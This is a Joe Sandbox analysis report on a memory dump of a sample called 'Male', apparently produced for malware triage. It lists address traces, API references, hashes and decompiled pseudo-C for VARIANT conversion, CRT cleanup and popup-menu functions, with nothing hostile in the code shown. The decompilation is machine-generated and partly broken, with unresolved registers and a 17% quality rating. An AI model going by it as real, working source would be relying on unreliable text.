0x013b3d10
0x013b3d1e
0x013b3d28
0x013b3d2a
0x013b3d35
0x013b3d35
0x013b3d3b
0x013b3d3d
0x013b3d42
0x013b3d45
0x013b3d46
0x013b3d46
0x013b3d4b
0x013f403a
0x013f403a
0x013f403d
0x013f40fa
0x013f40fc
0x00000000
0x013f40fc
0x013f4043
0x013f4043
0x013f4046
0x013f40f2
0x013f40f3
0x00000000
0x013f40f3
0x013f404c
0x013f404c
0x013f404f
0x013f4081
0x013f4087
0x013f4088
0x013f40e9
0x013f40e9
0x00000000
0x013f40e9
0x013f408c
0x013f408f
0x013f4090
0x013f4093
0x013f4095
0x00000000
0x00000000
0x013f4097
0x013f4097
0x013f409d
0x013f40a0
0x013f40a0
0x013f40a2
0x013f40a4
0x00000000
0x00000000
0x013f40af
0x013f40b5
0x013f40b7
0x013f40ba
0x00000000
0x00000000
0x013f40bc
0x013f40c3
0x00000000
0x00000000
0x013f40c9
0x013f40cb
0x013f40e4
0x00000000
0x013f40e4
0x013f40cd
0x013f40d0
0x013f40d0
0x013f40d1
0x013f40d4
0x013f40d7
0x013f40d7
0x013f40d7
0x00000000
0x013f40df
0x013f4051
0x013f4051
0x013f4054
0x013f4078
0x013f407a
0x00000000
0x013f407a
0x013f4056
0x013f4056
0x013f4059
0x013f4070
0x013f4071
0x00000000
0x013f4071
0x013f405b
0x013f405b
0x013f405e
0x00000000
0x00000000
0x013f4066
0x013f4067
0x00000000
0x013b3d51
0x013b3d53
0x013b3d54
0x013b3d56
0x013b3d58
0x013b3d5d
0x013b3d60
0x013f4103
0x013f410a
0x00000000
0x00000000
0x013f4110
0x013f411a
0x013f41bc
0x013f41c4
0x013f41cc
0x013f41d4
0x013f41d6
0x013f4120
0x013f4120
0x013f4124
0x013f412c
0x013f412e
0x013f4131
0x013f4133
0x013f4142
0x013f414c
0x013f414c
0x013f4155
0x013f415a
0x013f4166
0x013f4178
0x013f4182
0x013f418b
0x013f4190
0x013f419c
0x013f41a4
0x013f41aa
0x013f41aa
0x013f4124
0x013f41dc
0x013f41de
0x013f41e0
0x00000000
0x013f41e6
0x013f41e8
0x013f41eb
0x013f41f2
0x013f41f6
0x013f41fb
0x013f4208
0x013f420f
0x013f4216
0x013f4216
0x013f41ed
0x013f41ed
0x013f41ed
0x013f4220
0x013f4229
0x013f423c
0x013f4248
0x00000000
0x013f4250
0x013f41e0
0x013b3d6a
0x013b3d6a
0x013b3d6a

APIs

GetMenuItemCount.USER32 ref: 013F412C
GetMenuItemCount.USER32 ref: 013F41DC
GetCursorPos.USER32(?), ref: 013F4220
SetForegroundWindow.USER32(00000000), ref: 013F4229
TrackPopupMenuEx.USER32(014829B0,00000000,?,00000000,00000000,00000000), ref: 013F423C
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 013F4248

Strings

0, xrefs: 013B3D1E

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: b1ed55e67b2eb1067730196d365a29dc51eb3dbcd10f2bd23f5a439bd47157a7
Instruction ID: 5129fb763ae0f0fe0bf063fb3f08c7e43b6ad3f81c71556a0ad52fc79c5c4044
Opcode Fuzzy Hash: b1ed55e67b2eb1067730196d365a29dc51eb3dbcd10f2bd23f5a439bd47157a7
Instruction Fuzzy Hash: 2571E73064421ABBFB219F69DC88FAABF68FF1136CF10421AF714665E0C7B19810C794

Uniqueness

Uniqueness Score: -1.00%

Function 01421D4E, Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360
timeCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E01421D4E(signed int* __ecx, void* __edx, signed short* _a4) {
				signed long long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v32;
				signed int _v36;
				signed int _v38;
				signed int _v40;
				signed int _v42;
				signed int _v46;
				signed int _v48;
				signed long long _v56;
				char _v72;
				char _v88;
				char _v96;
				char _v112;
				char _v120;
				char _v136;
				char _v144;
				char _v176;
				signed int __esi;
				void* __ebp;
				signed int _t98;
				signed int _t99;
				signed short _t110;
				signed int _t112;
				signed int _t115;
				signed int _t117;
				signed int _t118;
				signed int _t120;
				signed int* _t130;
				intOrPtr _t137;
				signed short* _t153;
				signed int _t156;
				signed int _t157;
				void* _t158;

				_t153 = _a4;
				_t130 = __ecx;
				_t98 =  *_t153 & 0x0000ffff;
				_t158 = _t98 - 0x24;
				if(_t158 > 0) {
					_t99 = _t98 - 0x4002;
					__eflags = _t99 - 0x15;
					if(_t99 > 0x15) {
						L47:
						__eflags = 0;
						return 0;
					}
					switch( *((intOrPtr*)(_t99 * 4 +  &M01422236))) {
						case 0:
							__eax =  *(__edi + 8);
							__eflags = __eax;
							if(__eax == 0) {
								goto L9;
							}
							__esi =  *__eax;
							goto L7;
						case 1:
							__esi =  *(__edi + 8);
							__eflags = __esi;
							if(__esi == 0) {
								goto L9;
							}
							__esi =  *__esi;
							goto L7;
						case 2:
							__eax =  *(__edi + 8);
							__eflags = __eax;
							if(__eax == 0) {
								goto L9;
							}
							__fp0 =  *__eax;
							goto L17;
						case 3:
							__eax =  *(__edi + 8);
							__eflags = __eax;
							if(__eax == 0) {
								goto L9;
							}
							__fp0 =  *__eax;
							L17:
							_v16 = __fp0;
							__eax = E013BD720(__ecx);
							__fp0 = _v16;
							 *__ebx = _v16;
							 *((intOrPtr*)(__ebx + 0xc)) = 3;
							goto L9;
						case 4:
							goto L47;
						case 5:
							__eax =  *(__edi + 8);
							__eflags = __eax;
							if(__eflags == 0) {
								L73:
								_push(0x10);
								__eax = E013D01FB(__esi, __eflags);
								_pop(__ecx);
								__ecx = __eax;
								L23:
								__eax = E013B9091(__ecx, __eflags);
								L24:
								 *(__ebx + 8) = __eax;
								 *((intOrPtr*)(__ebx + 0xc)) = 4;
								goto L9;
							}
							__eflags =  *__eax;
							if(__eflags == 0) {
								goto L73;
							}
							_push(0x10);
							__eax = E013D01FB(__esi, __eflags);
							_pop(__ecx);
							__ecx =  *(__edi + 8);
							_push( *( *(__edi + 8)));
							__ecx = __eax;
							L22:
							__eax = E013BC110(__ecx, __eflags);
							goto L24;
						case 6:
							__eflags = _t153[4];
							if(__eflags != 0) {
								_push(0x10);
								 *((intOrPtr*)(__ecx + 0xc)) = 8;
								_t102 = E013D01FB(_t154, __eflags);
								_push(_t102);
								 *_t130 = _t102;
								__imp__#8();
								_push(9);
								_pop(_t133);
								 *( *_t130) = _t133;
								 *( *_t130 + 8) =  *(_t153[4]);
								_t135 =  *( *_t130 + 8);
								__eflags = _t135;
								if(_t135 != 0) {
									_push(_t135);
									 *((intOrPtr*)( *_t135 + 4))();
								}
							}
							goto L9;
						case 7:
							__eax =  *(__edi + 8);
							__eflags = __eax;
							if(__eax == 0) {
								goto L9;
							}
							__esi =  *__eax & 0x0000ffff;
							L26:
							__eax = E013BD720(__ecx);
							__eflags = __si;
							 *((intOrPtr*)(__ebx + 0xc)) = 9;
							__eax = __eax & 0xffffff00 | __si != 0x00000000;
							 *__ebx = __al;
							goto L9;
						case 8:
							__eflags =  *(__edi + 8);
							if( *(__edi + 8) != 0) {
								__eax = E01421570(__ecx, __edx,  *(__edi + 8));
							}
							goto L9;
						case 9:
							__eax =  *(__edi + 8);
							__eflags = __eax;
							if(__eax == 0) {
								goto L9;
							}
							__esi =  *__eax;
							goto L7;
						case 0xa:
							__eax =  *(__edi + 8);
							__eflags = __eax;
							if(__eax == 0) {
								goto L9;
							}
							__esi =  *__eax & 0x000000ff;
							goto L7;
						case 0xb:
							__eax =  *(__edi + 8);
							__eflags = __eax;
							if(__eax == 0) {
								goto L9;
							}
							__esi =  *__eax & 0x0000ffff;
							L7:
							__eax = E013BD720(__ecx);
							 *((intOrPtr*)(__ebx + 0xc)) = 1;
							goto L8;
						case 0xc:
							__edi =  *(__edi + 8);
							__eflags = __edi;
							if(__edi == 0) {
								L9:
								return 1;
							}
							__esi =  *__edi;
							__edi =  *(__edi + 4);
							L15:
							__eax = E013BD720(__ecx);
							 *((intOrPtr*)(__ebx + 0xc)) = 2;
							 *(__ebx + 4) = __edi;
							L8:
							 *__ebx = __esi;
							goto L9;
					}
				}
				if(_t158 == 0) {
					__imp__#8( &_v32);
					_t110 = _t153[6];
					_v24 = 0;
					_v20 = 0;
					 *((intOrPtr*)( *_t110 + 0x2c))(_t110, 0, 0,  &_v32, 0);
					_t112 = _v32;
					__eflags = _t112 & 0x00008000;
					if((_t112 & 0x00008000) == 0) {
						__imp__#9( &_v32);
						goto L47;
					}
					_t137 = 0xc;
					_t115 = (_t112 & 0x00000fff) - _t137;
					__eflags = _t115;
					if(__eflags == 0) {
						_push(0x14);
						 *((intOrPtr*)(__ecx + 0xc)) = _t137;
						_t117 = E0141F9BB(E013D01FB(0, __eflags), _v24);
						L44:
						 *_t130 = _t117;
						L45:
						_t118 = 0x1a;
						_v32 = _t118;
						__imp__#9( &_v32);
						goto L9;
					}
					_t120 = _t115 - 1;
					__eflags = _t120;
					if(__eflags == 0) {
						_push(0x14);
						 *((intOrPtr*)(__ecx + 0xc)) = 0xd;
						_t156 = E013D01FB(0, __eflags);
						E013B9091(_t156, __eflags);
						 *_t130 = _t156;
						 *((intOrPtr*)(_t156 + 0x10)) = _v24;
						goto L45;
					}
					__eflags = _t120 - 1;
					if(__eflags == 0) {
						 *((intOrPtr*)(__ecx + 0xc)) = 0xe;
						_t157 = E013D01FB(0, __eflags);
						E013B9091(_t157, __eflags);
						 *_t130 = _t157;
						E013BB0DB(_t157, _v24);
						__imp__#6(_v24, 0x14);
						goto L45;
					} else {
						_push(0x18);
						 *((intOrPtr*)(__ecx + 0xc)) = 0xf;
						_t117 = E013CBFA3(E013D01FB(0, __eflags), _v24);
						goto L44;
					}
				}
				if(_t98 > 0x17) {
					goto L47;
				}
				switch( *((intOrPtr*)(_t98 * 4 +  &M014221D6))) {
					case 0:
						_push(0x144dbf4);
						goto L28;
					case 1:
						__esp = __esp - 0x10;
						__ecx = __esp;
						__eax = E013BC110(__esp, __eflags, 0x144dbf4);
						_push(0);
						_push(0x2a);
						__ecx =  &_v96;
						E013CBBDC( &_v96) =  &_v96;
						__ecx = __ebx;
						__eax = E013CBB7F(__ebx,  &_v96);
						__ecx =  &_v88;
						goto L32;
					case 2:
						__esi =  *(__edi + 8);
						goto L7;
					case 3:
						__esi =  *(__edi + 8);
						goto L7;
					case 4:
						__fp0 =  *(__edi + 8);
						goto L17;
					case 5:
						__fp0 =  *(__edi + 8);
						goto L17;
					case 6:
						asm("fild qword [edi+0x8]");
						_v16 = __fp0;
						__fp0 = _v16;
						__fp0 = _v16 /  *0x1479128;
						goto L17;
					case 7:
						__fp0 =  *(__edi + 8);
						__eax =  &_v48;
						_push( &_v48);
						_push(__ecx);
						_push(__ecx);
						 *__esp =  *(__edi + 8);
						__imp__#185();
						__eax = _v36 & 0x0000ffff;
						_push(_v36 & 0x0000ffff);
						__eax = _v38 & 0x0000ffff;
						_push(_v38 & 0x0000ffff);
						__eax = _v40 & 0x0000ffff;
						_push(_v40 & 0x0000ffff);
						__eax = _v42 & 0x0000ffff;
						_push(_v42 & 0x0000ffff);
						__eax = _v46 & 0x0000ffff;
						_push(_v46 & 0x0000ffff);
						_v48 & 0x0000ffff =  &_v176;
						E013CFEFB(__ecx, __edx,  &_v176, L"%4d%02d%02d%02d%02d%02d", _v48 & 0x0000ffff) =  &_v176;
						__ecx = __ebx;
						_push( &_v176);
						L28:
						__eax = E013B600D(__ecx);
						goto L9;
					case 8:
						__esi =  *(__edi + 8);
						_push(0x10);
						__eax = E013D01FB(__esi, __eflags);
						_pop(__ecx);
						__ecx = __eax;
						__eflags = __esi;
						if(__eflags == 0) {
							goto L23;
						} else {
							_push( *(__edi + 8));
							goto L22;
						}
					case 9:
						_push(0x10);
						 *((intOrPtr*)(__ecx + 0xc)) = 8;
						_t128 = E013D01FB(_t154, _t159);
						_push(_t128);
						 *_t130 = _t128;
						__imp__#8();
						_push(_t153);
						_push( *_t130);
						__imp__#10();
						if(_t128 < 0) {
							_push( *_t130);
							__imp__#9();
							_push(0x10);
							E013D01ED( *_t130);
							 *_t130 =  *_t130 & 0x00000000;
						}
						goto L9;
					case 0xa:
						__esp = __esp - 0x10;
						__eflags =  *(__edi + 8) - 0x80020004;
						__ecx = __esp;
						if(__eflags != 0) {
							__eax = E013BC110(__ecx, __eflags, 0x144dbf4);
							_push(0);
							_push(0x2a);
							__ecx =  &_v144;
							E013CBBDC( &_v144) =  &_v144;
							__ecx = __ebx;
							__eax = E013CBB7F(__ebx,  &_v144);
							__ecx =  &_v136;
						} else {
							__eax = E013BC110(__ecx, __eflags, L"Default");
							_push(0);
							_push(0x29);
							__ecx =  &_v120;
							E013CBBDC( &_v120) =  &_v120;
							__ecx = __ebx;
							__eax = E013CBB7F(__ebx,  &_v120);
							__ecx =  &_v112;
						}
						L32:
						__eax = E013B774C(__ecx);
						goto L9;
					case 0xb:
						__esi =  *(__edi + 8) & 0x0000ffff;
						goto L26;
					case 0xc:
						goto L47;
					case 0xd:
						__esi = __edi;
						__eax =  &_v56;
						__edi =  &_v72;
						_push( &_v56);
						__eax =  &_v72;
						asm("movsd");
						_push( &_v72);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						__imp__#220();
						__fp0 = _v56;
						__ecx = __ebx;
						goto L17;
					case 0xe:
						__esi =  *(__edi + 8);
						goto L7;
					case 0xf:
						__esi =  *(__edi + 8) & 0x000000ff;
						goto L7;
					case 0x10:
						__esi =  *(__edi + 8) & 0x0000ffff;
						goto L7;
					case 0x11:
						__esi =  *(__edi + 8);
						__edi =  *(__edi + 0xc);
						goto L15;
				}
			}

0x01421d5a
0x01421d5d
0x01421d5f
0x01421d62
0x01421d65
0x01422087
0x0142208c
0x0142208f
0x0142207e
0x0142207e
0x00000000
0x0142207e
0x01422091
0x00000000
0x0142210a
0x0142210d
0x0142210f
0x00000000
0x00000000
0x01422115
0x00000000
0x00000000
0x01422130
0x01422133
0x01422135
0x00000000
0x00000000
0x0142213b
0x00000000
0x00000000
0x01422157
0x0142215a
0x0142215c
0x00000000
0x00000000
0x01422162
0x00000000
0x00000000
0x01422169
0x0142216c
0x0142216e
0x00000000
0x00000000
0x01422174
0x01421e08
0x01421e08
0x01421e0b
0x01421e10
0x01421e13
0x01421e15
0x00000000
0x00000000
0x00000000
0x00000000
0x0142217b
0x0142217e
0x01422180
0x0142219b
0x0142219b
0x0142219d
0x014221a2
0x014221a3
0x01421e4f
0x01421e4f
0x01421e54
0x01421e54
0x01421e57
0x00000000
0x01421e57
0x01422182
0x01422185
0x00000000
0x00000000
0x01422187
0x01422189
0x0142218e
0x0142218f
0x01422192
0x01422194
0x01421e48
0x01421e48
0x00000000
0x00000000
0x01422098
0x0142209c
0x014220a2
0x014220a4
0x014220ab
0x014220b1
0x014220b2
0x014220b4
0x014220bc
0x014220be
0x014220bf
0x014220c9
0x014220ce
0x014220d1
0x014220d3
0x014220db
0x014220dc
0x014220dc
0x014220d3
0x00000000
0x00000000
0x014221aa
0x014221ad
0x014221af
0x00000000
0x00000000
0x014221b5
0x01421e67
0x01421e67
0x01421e6c
0x01421e6f
0x01421e76
0x01421e79
0x00000000
0x00000000
0x014221bd
0x014221c1
0x014221ca
0x014221ca
0x00000000
0x00000000
0x014220e4
0x014220e7
0x014220e9
0x00000000
0x00000000
0x014220ef
0x00000000
0x00000000
0x014220f7
0x014220fa
0x014220fc
0x00000000
0x00000000
0x01422102
0x00000000
0x00000000
0x0142211d
0x01422120
0x01422122
0x00000000
0x00000000
0x01422128
0x01421dc2
0x01421dc2
0x01421dc7
0x00000000
0x00000000
0x01422142
0x01422145
0x01422147
0x01421dd0
0x00000000
0x01421dd0
0x0142214d
0x0142214f
0x01421df4
0x01421df4
0x01421df9
0x01421e00
0x01421dce
0x01421dce
0x00000000
0x00000000
0x01422091
0x01421d6b
0x01421f99
0x01421f9f
0x01421faa
0x01421fad
0x01421fb4
0x01421fb7
0x01421fba
0x01421fbf
0x01422078
0x00000000
0x01422078
0x01421fcc
0x01421fcd
0x01421fcd
0x01421fcf
0x01422047
0x01422049
0x01422057
0x0142205c
0x0142205c
0x0142205e
0x01422060
0x01422061
0x01422069
0x00000000
0x01422069
0x01421fd1
0x01421fd1
0x01421fd4
0x01422025
0x01422027
0x01422034
0x01422038
0x01422040
0x01422042
0x00000000
0x01422042
0x01421fd6
0x01421fd9
0x01421ff8
0x01422005
0x01422009
0x01422013
0x01422015
0x0142201d
0x00000000
0x01421fdb
0x01421fdb
0x01421fdd
0x01421fef
0x00000000
0x01421fef
0x01421fd9
0x01421d74
0x00000000
0x00000000
0x01421d7a
0x00000000
0x01421ef8
0x00000000
0x00000000
0x01421eff
0x01421f02
0x01421f09
0x01421f0e
0x01421f10
0x01421f12
0x01421f1a
0x01421f1d
0x01421f20
0x01421f25
0x00000000
0x00000000
0x01421ddd
0x00000000
0x00000000
0x01421de9
0x00000000
0x00000000
0x01421e05
0x00000000
0x00000000
0x01421e1e
0x00000000
0x00000000
0x01421e23
0x01421e26
0x01421e29
0x01421e2c
0x00000000
0x00000000
0x01421e80
0x01421e83
0x01421e86
0x01421e87
0x01421e88
0x01421e89
0x01421e8c
0x01421e92
0x01421e96
0x01421e97
0x01421e9b
0x01421e9c
0x01421ea0
0x01421ea1
0x01421ea5
0x01421ea6
0x01421eaa
0x01421eb0
0x01421ec4
0x01421eca
0x01421ecc
0x01421ecd
0x01421ecd
0x00000000
0x00000000
0x01421e34
0x01421e37
0x01421e39
0x01421e3e
0x01421e3f
0x01421e41
0x01421e43
0x00000000
0x01421e45
0x01421e45
0x00000000
0x01421e45
0x00000000
0x01421d81
0x01421d83
0x01421d8a
0x01421d90
0x01421d91
0x01421d93
0x01421d99
0x01421d9a
0x01421d9c
0x01421da4
0x01421da6
0x01421da8
0x01421dae
0x01421db2
0x01421db7
0x01421dbb
0x00000000
0x00000000
0x01421f32
0x01421f35
0x01421f3c
0x01421f3e
0x01421f6b
0x01421f70
0x01421f72
0x01421f74
0x01421f7f
0x01421f85
0x01421f88
0x01421f8d
0x01421f40
0x01421f45
0x01421f4a
0x01421f4c
0x01421f4e
0x01421f56
0x01421f59
0x01421f5c
0x01421f61
0x01421f61
0x01421f28
0x01421f28
0x00000000
0x00000000
0x01421e63
0x00000000
0x00000000
0x00000000
0x00000000
0x01421ed7
0x01421ed9
0x01421edc
0x01421edf
0x01421ee0
0x01421ee3
0x01421ee4
0x01421ee5
0x01421ee6
0x01421ee7
0x01421ee8
0x01421eee
0x01421ef1
0x00000000
0x00000000
0x01421dbe
0x00000000
0x00000000
0x01421dd7
0x00000000
0x00000000
0x01421de3
0x00000000
0x00000000
0x01421dee
0x01421df1
0x00000000
0x00000000

APIs

VariantInit.OLEAUT32(00000000), ref: 01421D93
VariantCopy.OLEAUT32(?,?), ref: 01421D9C
VariantClear.OLEAUT32(?), ref: 01421DA8
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 01421E8C
VarR8FromDec.OLEAUT32(?,?), ref: 01421EE8
VariantInit.OLEAUT32(?), ref: 01421F99
SysFreeString.OLEAUT32(?), ref: 0142201D
VariantClear.OLEAUT32(?), ref: 01422069
VariantClear.OLEAUT32(?), ref: 01422078
VariantInit.OLEAUT32(00000000), ref: 014220B4

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 01421EB6
Default, xrefs: 01421F40

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: cdb94d66eb645d0d35ed81b4c63f4befae64e2bd0eeac365fad776e00181e9e7
Instruction ID: d9c64d8fc81eb89c1d1694274b1a77a73efa7fb488b6e7b8359bbe720e7b9d52
Opcode Fuzzy Hash: cdb94d66eb645d0d35ed81b4c63f4befae64e2bd0eeac365fad776e00181e9e7
Instruction Fuzzy Hash: 1AD10C72A00126DBDB14EF69D484BBEBBB4FF14B40F404456E545EB2A4DB74BC82CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013EDE7D, Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E013EDE7D(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x147d8e0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E013E2DE8(_t46);
							E013EDA5C( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E013E2DE8(_t47);
							E013EDB5A( *((intOrPtr*)(_t74 + 0x88)));
						}
						E013E2DE8( *((intOrPtr*)(_t74 + 0x7c)));
						E013E2DE8( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E013E2DE8( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E013E2DE8( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E013E2DE8( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E013E2DE8( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E013EDFF1( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x147d1c8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E013E2DE8(_t31);
							E013E2DE8( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E013E2DE8(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E013E2DE8(_t74);
			}

0x013ede85
0x013ede89
0x013ede91
0x013ede9a
0x013ede9f
0x013edea6
0x013edeae
0x013edeb6
0x013edec1
0x013edec7
0x013edec8
0x013eded0
0x013eded8
0x013edee3
0x013edee9
0x013edeed
0x013edef8
0x013edefe
0x013ede9f
0x013edeff
0x013edf07
0x013edf1a
0x013edf2d
0x013edf3b
0x013edf46
0x013edf4b
0x013edf54
0x013edf5c
0x013edf5d
0x013edf63
0x013edf66
0x013edf69
0x013edf70
0x013edf72
0x013edf76
0x013edf7e
0x013edf85
0x013edf8b
0x013edf8c
0x013edf8c
0x013edf93
0x013edf95
0x013edf9a
0x013edfa2
0x013edfa7
0x013edfa8
0x013edfa8
0x013edfab
0x013edfae
0x013edfb1
0x013edfb4
0x013edfb4
0x013edfc6

APIs

___free_lconv_mon.LIBCMT ref: 013EDEC1

Part of subcall function 013EDA5C: _free.LIBCMT ref: 013EDA79
Part of subcall function 013EDA5C: _free.LIBCMT ref: 013EDA8B
Part of subcall function 013EDA5C: _free.LIBCMT ref: 013EDA9D
Part of subcall function 013EDA5C: _free.LIBCMT ref: 013EDAAF
Part of subcall function 013EDA5C: _free.LIBCMT ref: 013EDAC1
Part of subcall function 013EDA5C: _free.LIBCMT ref: 013EDAD3
Part of subcall function 013EDA5C: _free.LIBCMT ref: 013EDAE5
Part of subcall function 013EDA5C: _free.LIBCMT ref: 013EDAF7
Part of subcall function 013EDA5C: _free.LIBCMT ref: 013EDB09
Part of subcall function 013EDA5C: _free.LIBCMT ref: 013EDB1B
Part of subcall function 013EDA5C: _free.LIBCMT ref: 013EDB2D
Part of subcall function 013EDA5C: _free.LIBCMT ref: 013EDB3F
Part of subcall function 013EDA5C: _free.LIBCMT ref: 013EDB51

_free.LIBCMT ref: 013EDEB6

Part of subcall function 013E2DE8: RtlFreeHeap.NTDLL(00000000,00000000,?,013EDBF1,?,00000000,?,00000000,?,013EDC18,?,00000007,?,?,013EE016,?), ref: 013E2DFE
Part of subcall function 013E2DE8: GetLastError.KERNEL32(?,?,013EDBF1,?,00000000,?,00000000,?,013EDC18,?,00000007,?,?,013EE016,?,?), ref: 013E2E10

_free.LIBCMT ref: 013EDED8
_free.LIBCMT ref: 013EDEED
_free.LIBCMT ref: 013EDEF8
_free.LIBCMT ref: 013EDF1A
_free.LIBCMT ref: 013EDF2D
_free.LIBCMT ref: 013EDF3B
_free.LIBCMT ref: 013EDF46
_free.LIBCMT ref: 013EDF7E
_free.LIBCMT ref: 013EDF85
_free.LIBCMT ref: 013EDFA2
_free.LIBCMT ref: 013EDFBA

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: c84e11d7520f09236012f0e8d723542d01df18b5d598fedfddee53e9683f2f5b
Instruction ID: a6e54b2bcff7a8739f78ec8d4b0f2333c6da8e3ec3a13b50fe38e80e118179c8
Opcode Fuzzy Hash: c84e11d7520f09236012f0e8d723542d01df18b5d598fedfddee53e9683f2f5b
Instruction Fuzzy Hash: 2E314D31A0432A9FEB21ABBCDC4CB5B77E9AF50258F10441AE568DB1E0DF32A854CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0141C7A2, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190
windowsleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0141C7A2(struct HMENU__** __ecx, void* __eflags, void* __fp0, unsigned int _a12, signed int _a16) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				int _v24;
				struct tagMENUITEMINFOW _v72;
				void* __edi;
				unsigned int _t71;
				struct HMENU__* _t72;
				signed int _t76;
				signed int _t77;
				signed int _t80;
				int _t81;
				int _t82;
				signed int _t86;
				signed int _t90;
				intOrPtr _t92;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				int _t100;
				struct HMENU__* _t101;
				struct HMENU__* _t102;
				struct HMENU__** _t105;
				int _t108;
				signed int _t114;
				struct HMENU__** _t116;
				int _t117;
				int _t118;
				int _t119;
				void* _t125;

				_t125 = __fp0;
				_t117 = 0;
				_v72.cbSize = 0x30;
				_t116 = __ecx;
				E013D2760(__ecx,  &(_v72.fMask), 0, 0x2c);
				_v8 = _v8 | 0xffffffff;
				_v72.fMask = 1;
				if(E0141CCEE(_t116, _a12 & 0x0000ffff,  &_v8) == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t100 = _v8;
				_t10 = _t100 * 4; // 0x0
				_t105 =  *(_t116 + _t10 + 0x1b4);
				if(_t100 != 3) {
					__eflags = _t100 - 4;
					if(_t100 != 4) {
						_t71 = _a12 >> 0x10;
						__eflags = _t71;
						if(_t71 != 0) {
							goto L42;
						}
						__eflags = _a16;
						if(_a16 != 0) {
							goto L42;
						}
						__eflags =  *0x1482357 - _t71; // 0x0
						if(__eflags != 0) {
							goto L42;
						}
						__eflags = _t116[1];
						_t72 =  *_t105;
						_a12 = _t72;
						if(_t116[1] == 0) {
							L36:
							__eflags = _t116[1];
							if(__eflags != 0) {
								GetMenuItemInfoW(_t72, _t100, _t117,  &_v72);
								_t76 = _v72.fState;
								__eflags = _t76 & 0x00000008;
								if(__eflags == 0) {
									_t77 = _t76 | 0x00000008;
									__eflags = _t77;
								} else {
									_t77 = _t76 ^ 0x00000008;
								}
								_v72.fState = _t77;
